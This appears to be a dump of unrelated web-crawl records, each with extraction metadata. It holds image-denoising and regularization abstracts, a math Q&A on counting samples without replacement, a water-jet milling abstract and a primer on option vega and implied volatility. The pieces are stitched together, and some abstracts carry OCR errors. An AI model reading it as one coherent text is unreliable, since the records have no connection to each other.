optimization technique with a suitable mathematical background is proposed to detect automatically three crucial parameters: α0, α1 and θ. The parameters α0, α1 control the Total Generalized Variation (TGV) regularization while the parameter θ is related to the anisotropic diffusive tensor. A proper selection of these parameters represents a challenging task. Since these parameters are always related to a better approximation of the image gradient and texture, their computation plays a major role in preserving the image features. Analytically, we include results on the approximation of these parameters as well as the resolution of the encountered bilevel problem in a suitable framework. In addition, to resolve the PDE-constrained minimization problem, a modified primal-dual algorithm is proposed. Finally, numerical results are provided to remove noise and simultaneously keep safe fine details and important features with numerous comparisons to show the performance of the proposed approach. Chapter Full-text available So far we have been concerned with the theory of scale-space representation and its application to feature detection in image data. A basic functionality of a computer vision system, however, is the ability to derive information about the three-dimensional shape of objects in the world. Article Full-text available Lagrangian and augmented Lagrangian methods for nondifferentiable optimization problems that arise from the total bounded variation formulation of image restoration problems are analyzed. Conditional convergence of the Uzawa algorithm and unconditional convergence of the first order augmented Lagrangian schemes are discussed. A Newton type method based on an active set strategy defined by means of the dual variables is developed and analyzed. Numerical examples for blocky signals and images perturbed by very high noise are included. Résumé On analyse les méthodes de lagrangien et de lagrangien augmenté pour des problèmes d'optimisation non différentiable, provenant de la formulation de variation totale bornée en restauration d'images. La convergence conditionnelle de l'algorithme d'Uzawa et la convergence inconditionnelle des schémas de premier ordre de lagrangien augmenté sont discutées. Une méthode de type Newton basée sur une statégie d'ensemble actif, définie au moyen de variables primales et duales, est développée et analysée. Des exemples numériques sont donnés pour des signaux discontinus et des images pertubées par très fort bruit. Article Full-text available A convergence rate is established for nonstationary iterated Tikhonov regularization, applied to ill-posed problems involving closed, densely defined linear operators, under general conditions on the iteration parameters. It is also shown that an order-optimal accuracy is attained when a certain a posteriori stopping rule is used to determine the iteration number. Article Full-text available Spectral theory for bounded linear operators is used to develop a general class of approximation methods for the Moore-Penrose generalized inverse of a closed, densely defined linear operator. Issues of convergence and stability are addressed and the methods are modified to provide a stable class of methods for evaluation of unbounded linear operators. Article Full-text available A constrained optimization type of numerical algorithm for removing noise from images is presented. The total variation of the image is minimized subject to constraints involving the statistics of the noise. The constraints are imposed using Lanrange multipliers. The solution is obtained using the gradient-projection method. This amounts to solving a time dependent partial differential equation on a manifold determined by the constraints. As t → ∞ the solution converges to a steady state which is the denoised image. The numerical algorithm is simple and relatively fast. The results appear to be state-of-the-art for very noisy images. The method is noninvasive, yielding sharp edges in the image. The technique could be interpreted as a first step of moving each level set of the image normal to itself with velocity equal to the curvature of the level set divided by the magnitude of the gradient of the image, and a second step which projects the image back onto the constraint set. Book Full-text available Introduction.- Convex Analysis and the Scalar Case.- Convex Sets and Convex Functions.- Lower Semicontinuity and Existence Theorems.- The one Dimensional Case.- Quasiconvex Analysis and the Vectorial Case.- Polyconvex, Quasiconvex and Rank one Convex Functions.- Polyconvex, Quasiconvex and Rank one Convex Envelopes.- Polyconvex, Quasiconvex and Rank one Convex Sets.- Lower Semi Continuity and Existence Theorems in the Vectorial Case.- Relaxation and Non Convex Problems.- Relaxation Theorems.- Implicit Partial Differential Equations.- Existence of Minima for Non Quasiconvex Integrands.- Miscellaneous.- Function Spaces.- Singular Values.- Some Underdetermined Partial Differential Equations.- Extension of Lipschitz Functions on Banach Spaces.- Bibliography.- Index.- Notations. Article Full-text available Diffusion processes create multi--scale analyses, which enable the generation of simplified pictures, where for increasing scale the image gets sketchier. In many practical applications the scaled image'' can be characterized via a variational formulation as the solution of a minimization problem involving unbounded operators. These unbounded operators can be evaluated by regularization techniques. We show that the theory of stable evaluation of unbounded operators can be applied to efficiently solve these minimization problems. Article Full-text available A reliable and efficient computational algorithm for restoring blurred and noisy images is proposed. The restoration process is based on the minimal total variation principle introduced by Rudin et al. For discrete images, the proposed algorithm minimizes a piecewise linear l <sub>1</sub> function (a measure of total variation) subject to a single 2-norm inequality constraint (a measure of data fit). The algorithm starts by finding a feasible point for the inequality constraint using a (partial) conjugate gradient method. This corresponds to a deblurring process. Noise and other artifacts are removed by a subsequent total variation minimization process. The use of the linear l<sub>1</sub> objective function for the total variation measurement leads to a simpler computational algorithm. Both the steepest descent and an affine scaling Newton method are considered to solve this constrained piecewise linear l<sub>1</sub> minimization problem. The resulting algorithm, when viewed as an image restoration and enhancement process, has the feature that it can be used in an adaptive/interactive manner in situations when knowledge of the noise variance is either unavailable or unreliable. Numerical examples are presented to demonstrate the effectiveness of the proposed iterative image restoration and enhancement process Article Full-text available Mathematical results on ill-posed and ill-conditioned problems are reviewed and the formal aspects of regularization theory in the linear case are introduced. Specific topics in early vision and their regularization are then analyzed rigorously, characterizing existence, uniqueness, and stability of solutions. A fundamental difficulty that arises in almost every vision problem is scale, that is, the resolution at which to operate. Methods that have been proposed to deal with the problem include scale-space techniques that consider the behavior of the result across a continuum of scales. From the point of view of regulation theory, the concept of scale is related quite directly to the regularization parameter λ. It suggested that methods used to obtained the optimal value of λ may provide, either directly or after suitable modification, the optimal scale associated with the specific instance of certain problems Book Full-text available A basic problem when deriving information from measured data, such as images, originates from the fact that objects in the world, and hence image structures, exist as meaningful entities only over certain ranges of scale. "Scale-Space Theory in Computer Vision" describes a formal theory for representing the notion of scale in image data, and shows how this theory applies to essential problems in computer vision such as computation of image features and cues to surface shape. The subjects range from the mathematical foundation to practical computational techniques. The power of the methodology is illustrated by a rich set of examples This book is the first monograph on scale-space theory. It is intended as an introduction, reference, and inspiration for researchers, students, and system designers in computer vision as well as related fields such as image processing, photogrammetry, medical image analysis, and signal processing in general. Conference Paper Full-text available . Computational vision often needs to deal with derivatives of digital images. Such derivatives are not intrinsic properties of digital data; a paradigm is required to make them well-defined. Normally, a linear filtering is applied. This can be formulated in terms of scale-space, functional minimization, or edge detection filters. The main emphasis of this paper is to connect these theories in order to gain insight in their similarities and differences. We take regularization (or functional minimization) as a starting point, and show that it boils down to Gaussian scale-space if we require scale invariance and a semi-group constraint to be satisfied. This regularization implies the minimization of a functional containing terms up to infinite order of differentiation. If the functional is truncated at second order, the Canny-Deriche filter arises. 1 Introduction Given a digital signal in one or more dimensions, we want to define its derivatives in a well-posed way. This can... Article Full-text available We discuss a semidiscrete framework for nonlinear diffusion scale-spaces, where the image is sampled on a finite grid and the scale parameter is continuous. This leads to a system of nonlinear ordinary differential equations. We investigate conditions under which one can guarantee well-posedness properties, an extremum principle, average grey level invariance, smoothing Lyapunov functionals, and convergence to a constant steady-state. These properties are in analogy to previously established results for the continuous setting. Interestingly, this semidiscrete framework helps to explain the so-called Perona-Malik paradox: The Perona-Malik equation is a forward-backward diffusion equation which is widely-used in image processing since it combines intraregional smoothing with edge enhancement. Although its continuous formulation is regarded to be ill-posed, it turns out that a spatial discretization is sufficient to create a well-posed semidiscrete diffusion scale-space. We also pro... Book I: Parametric Minimal Surfaces.- 1. Functions of Bounded Variation and Caccioppoli Sets.- 2. Traces of BV Functions.- 3. The Reduced Boundary.- 4. Regularity of the Reduced Boundary.- 5. Some Inequalities.- 6. Approximation of Minimal Sets (I).- 7. Approximation of Minimal Sets (II).- 8. Regularity of Minimal Surfaces.- 9. Minimal Cones.- 10. The First and Second Variation of the Area.- 11. The Dimension of the Singular Set.- II: Non-Parametric Minimal Surfaces.- 12. Classical Solutions of the Minimal Surface Equation.- 13. The a priori Estimate of the Gradient.- 14. Direct Methods.- 15. Boundary Regularity.- 16. A Further Extension of the Notion of Non-Parametric Minimal Surface.- 17. The Bernstein Problem.- Appendix A.- Appendix B.- Appendix C. Article Shock filters for image enhancement are developed. The filters use new nonlinear time dependent partial differential equations and their discretizations. The evolution of the initial image $u_0 (x,y)$ as $t \to \infty$ into a steady state solution $u_\infty (x,y)$ through $u(x,y,t)$, $t > 0$, is the filtering process. The partial differential equations have solutions which satisfy a maximum principle. Moreover the total variation of the solution for any fixed $t > 0$ is the same as that of the initial data. The processed image is piecewise smooth, nonoscillatory, and the jumps occur across zeros of an elliptic operator (edge detector). The algorithm is relatively fast and easy to program. Article A new version of the Perona and Malik theory for edge detection and image restoration is proposed. This new version keeps all the improvements of the original model and avoids its drawbacks: it is proved to be stable in presence of noise, with existence and uniqueness results. Numerical experiments on natural images are presented. Article The authors analyze an initial-boundary value problem for the equation $u_t = \varphi (u_x )_x + \tau \psi (u_x )xt,$ where $\tau$ is a positive parameter, $\varphi ,\psi :{\bf R} \to {\bf R}$, $\varphi$ is nonmonotone, $\psi$ is strictly increasing and uniformly bounded in ${\bf R}$, and $|\varphi '(p)| = O(\psi '(p))$ as $p \to \pm \infty$. The equation arises as a (new) model for turbulent heat or mass transfer in stably stratified shear flows, in which case $u_x$ is nonnegative, $\varphi (p) > 0$ for $p > 0$, and $\varphi (0) = \varphi ( + \infty ) = 0$. Well-posedness is proved and, in the model case, the qualitative behavior of solutions is studied. In particular it is shown that smooth solutions may become discontinuous in finite time, and that such solutions converge to a piecewise constant spatial profile as $t \to \infty$. This behavior is in agreement with experimental observations and numerical computations. Article Let A be an operator from a real Banach space into a real Hilbert space. In this paper we study least squares regularization methods for the ill-posed operator equation A(u) = f using nonlinear nondifferentiable penalty functionals. We introduce a notion of distributional approximation, and use constructs of distributional approximations to establish convergence and stability of approximations of bounded variation solutions of the operator equation. We also show that the results provide a framework for a rigorous analysis of numerical methods based on Euler-Lagrange equations to solve the minimization problem. This justifies many of the numerical implementation schemes of bounded variation minimization that have been recently proposed. Article The problem of recovering images with sharp edges by total variation denoising has recently received considerable attention in image processing. Numerical difficulties in implementing this nonlinear filter technique are partly due to the fact that it involves the stable evaluations of unbounded operators. To overcome that difficulty we propose to approximate the evaluation of the unbounded operator by a stable approximation. A convergence analysis for this regularized approach is presented. Thesis In this work a scale-space framework has been presented which does not require any monotony assumption (comparison principle). We have seen that, besides the fact that many global smoothing scale-space properties are maintained, new possibilities with respect to image restoration appear. Rather than deducing a unique equation from first principles, we have analyzed well-posedness and scale-space properties of a general family of regularized anisotropic diffusion filters. Existence and uniqueness results, continuous dependence of the solution on the initial image, maximum-minimum principles, invariances, Lyapunov functionals, and convergence to a constant steady state have been established. The large class of Lyapunov functionals permits to regard these filters in numerous ways as simplifying, information-reducing transformations. These global smoothing properties do not contradict seemingly opposite local effects such its edge enhancement. For this reason it is possible to design scale-spaces with restoration properties giving segmentation-like results. Prerequisites have been stated under which one can prove well-posedness and scale-space results in the continuous, semidiscrete and discrete setting. Each of these frameworks stands on its own and does not require the others. On the other hand, the prerequisites in all three settings reveal many similarities and, as a consequence, representatives of the semidiscrete class can be obtained by suitable spatial discretizations of the continuous class, while representatives of the discrete class may arise from time discretizations of semidiscrete filters. The degree of freedom within the proposed class of filters can be used to tailor the filters towards specific restoration tasks. Therefore, these scale-spaces do not need to be uncommitted; they give the user the liberty to incorporate a-priori knowledge, for instance concerning size and contrast of especially interesting features. The analyzed class comprises linear diffusion filtering and the nonlinear isotropic model of Catté, Lions, Morel, Coll and Whitaker and Pizer, but also novel approaches have been proposed: The use of diffusion tensors instead of scalar-valued diffusivities puts us in a position to design real anisotropic diffusion processes which may reveal advantages at noisy edges. Last but not least, the fact that these filters are steered by the structure tensor instead of the regularized gradient allows to adapt them to more sophisticated tasks such as the enhancement of coherent flow-like structures. In view of these results, anisotropic diffusion deserves to be regarded as much more than all ad-hoc strategy for transforming a degraded image into a more pleasant looking one. It is a flexible and mathematically sound class of methods which ties the advantages of two worlds: scale-space analysis and image restoration. Article Regularization with functions of bounded variation has been proven to be effective for denoising signals and images. This nonlinear regularization technique, in contrast with linear regularization techniques like Tikhonov regularization, has the advantage that discontinuities in signals and images can be located very precisely. In this paper bounded variation regularization is generalized to functions with higher order derivatives of bounded variation. This concept is applied to locate discontinuities in derivatives, which has important applications in parameter estimation problems. Article We study here a classical image denoising technique introduced by L. Rudin and S. Osher a few years ago, namely the constrained minimization of the total variation (TV) of the image. First, we give results of existence and uniqueness and prove the link between the constrained minimization problem and the minimization of an associated Lagrangian functional. Then we describe a relaxation method for computing the solution, and give a proof of convergence. After this, we explain why the TV-based model is well suited to the recovery of some images and not of others. We eventually propose an alternative approach whose purpose is to handle the minimization of the minimum of several convex functionals. We propose for instance a variant of the original TV minimization problem that handles correctly some situations where TV fails. Conference Paper We show that regularization methods can be regarded as scale-spaces where the regularization parameter serves as scale. In analogy to nonlinear diffusion filtering we establish continuity with respect to scale, causality in terms of a maximum/minimum principle, simplifica- tion properties by means of Lyapunov functionals and convergence to a constant steady-state. We identify nonlinear regularization with a single implicit time step of a diffusion process. This implies that iterated regu- larization with small regularization parameters is a numerical realization of a diffusion filter. Numerical experiments in two and three space dimen- sions illustrate the scale-space behaviour of regularization methods. Article A global edge detection algorithm based on variational regularization is presented and analysed. The algorithm can also be viewed as an anisotropic diffusion method. These two quite different methods are thereby unified from the original outlook. This puts anisotropic diffusion, as a method in early vision, on more solid grounds; it is just as well founded as the well-accepted standard regularization techniques. The unification also brings the anisotropic diffusion method an appealing sense of optimality, thereby intuitively explaining its extraordinary performance. The algorithm to be presented, moreover, has the following attractive properties:1. It only requires the solution of a single boundary value problem over the entire image domain — almost always a very simple (rectangular) region.2. It converges to the solution of interest.The first of these properties implies very significant advantages over other existing regularization methods; the computation cost is typically cut by an order of magnitude or more. The second property represents considerable advantages over the existing diffusion methods; it removes the problem of deciding when to stop, as well as that of actually stopping the diffusion process. Conference Paper Many image processing problems are ill-posed and must be regularized. Usually, a roughness penalty is imposed on the solution. The difficulty is to avoid the smoothing of edges, which are very important attributes of the image. The authors first give sufficient conditions for the design of such an edge-preserving regularization. Under these conditions, it is possible to introduce an auxiliary variable whose role is twofold. Firstly, it marks the discontinuities and ensures their preservation from smoothing. Secondly, it makes the criterion half-quadratic. The optimization is then easier. The authors propose a deterministic strategy, based on alternate minimizations on the image and the auxiliary variable. This yields two algorithms, ARTUR and LEGEND. The authors apply these algorithms to the problem of SPECT reconstruction Article We propose the minimization of a nonquadratic functional or, equivalently, a nonlinear diffusion model to smooth noisy image functionsg:Ω ⊂R n →R while preserving significant transitions of the data. The model is chosen such that important properties of the conventional quadratic-functional approach still hold: (1) existence of a unique solution continuously depending on the datag and (2) stability of approximations using the standard finite-element method. Relations with other global approaches for the segmentation of image data are discussed. Numerical experiments with real data illustrate this approach. Article This book contains both a synthesis and mathematical analysis of a wide set of algorithms and theories whose aim is the automatic segmen­ tation of digital images as well as the understanding of visual perception. A common formalism for these theories and algorithms is obtained in a variational form. Thank to this formalization, mathematical questions about the soundness of algorithms can be raised and answered. Perception theory has to deal with the complex interaction between regions and "edges" (or boundaries) in an image: in the variational seg­ mentation energies, "edge" terms compete with "region" terms in a way which is supposed to impose regularity on both regions and boundaries. This fact was an experimental guess in perception phenomenology and computer vision until it was proposed as a mathematical conjecture by Mumford and Shah. The third part of the book presents a unified presentation of the evi­ dences in favour of the conjecture. It is proved that the competition of one-dimensional and two-dimensional energy terms in a variational for­ mulation cannot create fractal-like behaviour for the edges. The proof of regularity for the edges of a segmentation constantly involves con­ cepts from geometric measure theory, which proves to be central in im­ age processing theory. The second part of the book provides a fast and self-contained presentation of the classical theory of rectifiable sets (the "edges") and unrectifiable sets ("fractals"). Article Tikhonov regularization with a modified total variation regularization functional is used to recover an image from noisy, blurred data. This approach is appropriate for image processing in that it does not place a priori smoothness conditions on the solution image. An efficient algorithm is presented for the discretized problem that combines a fixed point iteration to handle nonlinearity with a new, effective preconditioned conjugate gradient iteration for large linear systems. Reconstructions, convergence results, and a direct comparison with a fast linear solver are presented for a satellite image reconstruction application Article We present a blind deconvolution algorithm based on the total variational (TV) minimization method proposed by Acar and Vogel (1994). The motivation for regularizing with the TV norm is that it is extremely effective for recovering edges of images as well as some blurring functions, e.g., motion blur and out-of-focus blur. An alternating minimization (AM) implicit iterative scheme is devised to recover the image and simultaneously identify the point spread function (PSF). Numerical results indicate that the iterative scheme is quite robust, converges very fast (especially for discontinuous blur), and both the image and the PSF can be recovered under the presence of high noise level. Finally, we remark that PSFs without sharp edges, e.g., Gaussian blur, can also be identified through the TV approach Article One popular method for the recovery of an ideal intensity image from corrupted or indirect measurements is regularization: minimize an objective function that enforces a roughness penalty in addition to coherence with the data. Linear estimates are relatively easy to compute but generally introduce systematic errors; for example, they are incapable of recovering discontinuities and other important image attributes. In contrast, nonlinear estimates are more accurate but are often far less accessible. This is particularly true when the objective function is nonconvex, and the distribution of each data component depends on many image components through a linear operator with broad support. Our approach is based on an auxiliary array and an extended objective function in which the original variables appear quadratically and the auxiliary variables are decoupled. Minimizing over the auxiliary array alone yields the original function so that the original image estimate can be obtained by joint minimization. This can be done efficiently by Monte Carlo methods, for example by FFT-based annealing using a Markov chain that alternates between (global) transitions from one array to the other. Experiments are reported in optical astronomy, with space telescope data, and computed tomography Article A novel method of reconstruction from single-photon emission computerized tomography data is proposed. This method builds on the expectation-maximization (EM) approach to maximum likelihood reconstruction from emission tomography data, but aims instead at maximum posterior probability estimation, which takes account of prior belief about smoothness in the isotope concentration. A novel modification to the EM algorithm yields a practical method. The method is illustrated by an application to data from brain scans Article The authors describe a model of nonlinear image filtering for noise reduction and edge enhancement using anisotropic diffusion. The method is designed to enhance not only edges, but corners and T junctions as well. The method roughly corresponds to a nonlinear diffusion process with backward heat flow across the strong edges. Such a process is ill posed, making the results depend strongly on how the algorithm differs from the diffusion process. Two ways of modifying the equations using simulations on a variable grid are studied Article A new definition of scale-space is suggested, and a class of algorithms used to realize a diffusion process is introduced. The diffusion coefficient is chosen to vary spatially in such a way as to encourage intraregion smoothing rather than interregion smoothing. It is shown that the `no new maxima should be generated at coarse scales' property of conventional scale space is preserved. As the region boundaries in the approach remain sharp, a high-quality edge detector which successfully exploits global information is obtained. Experimental results are shown on a number of images. Parallel hardware implementations are made feasible because the algorithm involves elementary, local operations replicated over the image Article . A computational algorithm is proposed for image enhancement based on total variation minimization with constraints. This constrained minimization problem is introduced by Rudin et al [13, 14, 15] to enhance blurred and noisy images. Our computational algorithm solves the constrained minimization problem directly by adapting the affine scaling method for the unconstrained l 1 problem [3]. The resulting computational scheme, when viewed as an image enhancement process, has the feature that it can be used in an interactive manner in situations where knowledge of the noise level is either unavailable or unreliable. This computational algorithm can be implemented with a conjugate gradient method. It is further demonstrated that the iterative enhancement process is efficient. Key Words. image enhancement, image reconstruction, deconvolution, minimal total variation, affine scaling algorithm, projected gradient method Department of Computer Science and Advanced Computing Research Institut... Article . This paper gives an overview of scale-space and image enhancement techniques which are based on parabolic partial differential equations in divergence form. In the nonlinear setting this filter class allows to integrate a-priori knowledge into the evolution. We sketch basic ideas behind the different filter models, discuss their theoretical foundations and scale-space properties, discrete aspects, suitable algorithms, generalizations, and applications. 1 Introduction During the last decade nonlinear diffusion filters have become a powerful and well-founded tool in multiscale image analysis. These models allow to include a-priori knowledge into the scale-space evolution, and they lead to an image simplification which simultaneously preserves or even enhances semantically important information such as edges, lines, or flow-like structures. Many papers have appeared proposing different models, investigating their theoretical foundations, and describing interesting applications. For a... Article . This paper presents an abstract analysis of bounded variation (BV) methods for ill-posed operator equations Au = z. Let T (u) def = kAu Gamma zk 2 + ffJ(u); where the penalty, or "regularization", parameter ff ? 0 and the functional J(u) is the BV norm or seminorm of u, also known as the total variation of u. Under mild restrictions on the operator A and the functional J(u), it is shown that the functional T (u) has a unique minimizer which is stable with respect to certain perturbations in the data z, the operator A, the parameter ff, and the functional J(u). In addition, convergence results are obtained which apply when these perturbations vanish and the regularization parameter is chosen appropriately. Key words. total variation, bounded variation, regularization, compact operator equations, ill-posed problems AMS(MOS) subject classifications. 49J10, 49J27, 49J45, 49K40, 65R30 1. Introduction. Consider the equation Au = z (1.1) where A is a linear operator from L p (... Article . In total variation denoising, one attempts to remove noise from a signal or image by solving a nonlinear minimization problem involving a total variation criterion. Several approaches based on this idea have recently been shown to be very effective, particularly for denoising functions with discontinuities. This paper analyzes the convergence of an iterative method for solving such problems. The iterative method involves a "lagged diffusivity" approach in which a sequence of linear diffusion problems are solved. Global convergence in a finite dimensional setting is established, and local convergence properties, including rates and their dependence on various parameters, are examined. Key words. denoising, total variation, convergence analysis. AMS(MOS) subject classifications. 49M05, 65K10 1. Introduction. Consider the problem of reconstructing an unknown function u, called the image, from data z satisfying z = u + ffl: (1.1) Here ffl represents error, or noise, in the data. It i...
2022-10-07 00:47:19
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5487824082374573, "perplexity": 835.2605041256674}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00595.warc.gz"}
https://math.codidact.com/posts/282605
Q&A # Intuitively, if you pick k out of n objects singly without replacement, why's the number of possible outcomes NOT $n(n-1) \dots [(n-(k - 1)]\color{red}{(n - k)}$? +0 −3 I know that $\color{limegreen}{(n-k+1)} \equiv (n - (k - 1))$. But whenever I contemplate choosing k from n objects singly without replacement, I keep muffing the number of possible outcomes as $n(n-1) \dots \color{limegreen}(n-k+1)\color{red}{(n - k)}$. I bungled by adding the unnecessary and wrong $\color{red}{(n - k)}$, probably because I affiliated choosing K objects with $\color{red}{(n - k)}$! How can I rectify my Fence Post Error? How can I intuitively remember to stop at $\color{limegreen}{(n-(k-1)}$? ### Theorem 1.4.8 (Sampling without replacement). Consider n objects and making k choices from them, one at a time without replacement (i.e., choosing a certain object precludes it from being chosen again). Then there are $n(n-1) \dots \color{limegreen}{(n-k+1)}$ possible outcomes for $1 \le k \le n$, and 0 possibilities for $k > n$ (where order matters). By convention, $n(n-1) \dots {\color{limegreen}{(n-k+1)}} = n$ for k = 1. This result also follows directly from the multiplication rule: each sampled ball is again a sub-experiment, and the number of possible outcomes decreases by 1 each time. Note that for sampling k out of n objects without replacement, we need $k \le n$, whereas in sampling with replacement the objects are inexhaustible. Blitzstein. Introduction to Probability (2019 2 ed). p. 12. Why does this post require moderator attention? Why should this post be closed? +0 −0 Each term of that product gives the size of the pool when you pick an object out – it's the number of possible items you can pick out at that moment, if you're picking them one at a time. Once you've taken $k$ items out of a pool of $n$ items, there are $n - k$ objects left over. This means that, when you were picking the last item out, your last item was also in the pool, giving a final term of $(n - k) + 1$. I find the easiest way to get an intuition for something like this is to derive it from first principles. Mathematics only works for real-world problems when there's a relation between the problem and the mathematics, but it goes the other way, too: if some mathematics solves a problem, and you try to solve the problem from scratch, you'll end up doing something equivalent to that mathematics. If your solution is intuitive to you, then that intuition also applies to the mathematics. Ultimately, the solution to a “this is not intuitive” problem is specific to the way you think. That also means such questions probably aren't appropriate for this site; consider asking a teacher instead. Why does this post require moderator attention?
2021-10-26 13:55:42
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8467313647270203, "perplexity": 401.83084804195437}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323587908.20/warc/CC-MAIN-20211026134839-20211026164839-00610.warc.gz"}
https://depositonce.tu-berlin.de/items/427c9f70-b23b-48b3-834c-438b19695fcd
# Efficient abrasive water jet milling for near-net-shape fabrication of difficult-to-cut materials ## FG Werkzeugmaschinen und Fertigungstechnik The utilization of materials with high strength to density ratio enables efficiency improvements and is therefore demanded for many applications, particularly in the aerospace and other mobility sectors. However, the machining of these typically difficult-to-cut materials poses a challenge for conventional manufacturing technologies due to the high tool wear. Abrasive water jet (AWJ) machining is a promising alternative manufacturing technology for machining difficult-to-cut materials, since the tool wear is low and material independent. However, AWJ machining is limited regarding the producible geometries when conducting cuts through a material. This limitation can be resolved with AWJ milling operations which on the other hand are time-consuming. To approach this challenge, an enhanced AWJ milling operation is presented and investigated in this paper with the aim to expand the producible geometries. This operation consists of two kerfs, inserted from different sides of the workpiece, which intersect at their kerf ground. Consequently, a piece of material is separated without the cut material being entirely chipped. Thus, the operation possesses a high aggregated material removal rate. The investigations presented in this paper show and evaluate the effects that occur during the milling of kerfs with variable depths on titanium aluminide TNM-B1. Furthermore, a method to compensate these effects is introduced and thus the producible geometries for effective AWJ milling could be enhanced.
2023-03-22 09:06:40
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8227576017379761, "perplexity": 3733.2379891085293}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943809.22/warc/CC-MAIN-20230322082826-20230322112826-00032.warc.gz"}
https://financeunlocked.com/equity-option-trading-3-3-vega-and-implied-volatility/
0 # Equity Option Trading (3/3): Vega and Implied Volatility 13:27 #### Executive summary When there is a significant event on the calendar, such as an election, the forward volatility that can be extracted from the term structure for a time span that captures the event is often elevated. This creates "kinks" in the volatility curve, which traders often buy or sell based on their expectations for the amount of volatility that the event would generate. #### Key learning objectives: • What is Implied Volatility and how is it extracted from market option prices through Black-Scholes model? • What is Vega & term structure of volatility? • How do we calculate weighted vega? • What is Forward Volatility? #### What is Implied Volatility? Implied Volatility of an option is the market’s expectation of future realised volatility of the underlying equity up to a given maturity. #### How do we use the Black-Scholes model to extract implied volatility from market option prices? The Black-Scholes formula allows us to convert a fair option price, which is determined from the market by aggregating all buyers and sellers, into an annualised volatility which we call the implied volatility. We can 'imply' the volatility because the other inputs to the model are known and so the only unknown is the volatility which we can then solve for to arrive at our desired option fair value. #### What is Vega & term structure of volatility? Vega is the shift in option value caused by an increase in implied volatility of 1% or 1 vol point. You are Long Vega if you are long an option. As the implied volatility increases, the time value increases and the option gains in value.  If the implied volatility went down to zero, the option would lose all its time value and be only worth its intrinsic value (if it had any). We can trade options of many different expiries. These different expiries or maturities do not have to be priced on the same implied volatility for any given asset. We can see that implied volatility has a term structure, similar to a yield curve in interest rates, when we plot vol on the y-axis and maturity on the X-axis. The shape of that term structure can vary depending on market conditions. #### How do we calculate weighted vega? Because of the way the variable of time appears in the BS model, we infer that the acceptable weighting factor to use is 1/sqrt(T), where T is maturity in years. It is also the market convention and accurately reflects how we observe volatility surface changes on a daily basis. #### What is Forward Volatility? It is the implied volatility for a specific period of time in the future between two points on the curve. Scroll to top
2021-04-22 14:11:02
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8173209428787231, "perplexity": 1080.587809684156}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618039610090.97/warc/CC-MAIN-20210422130245-20210422160245-00298.warc.gz"}
https://www.r-bloggers.com/2013/01/safely-loading-packages-in-r/
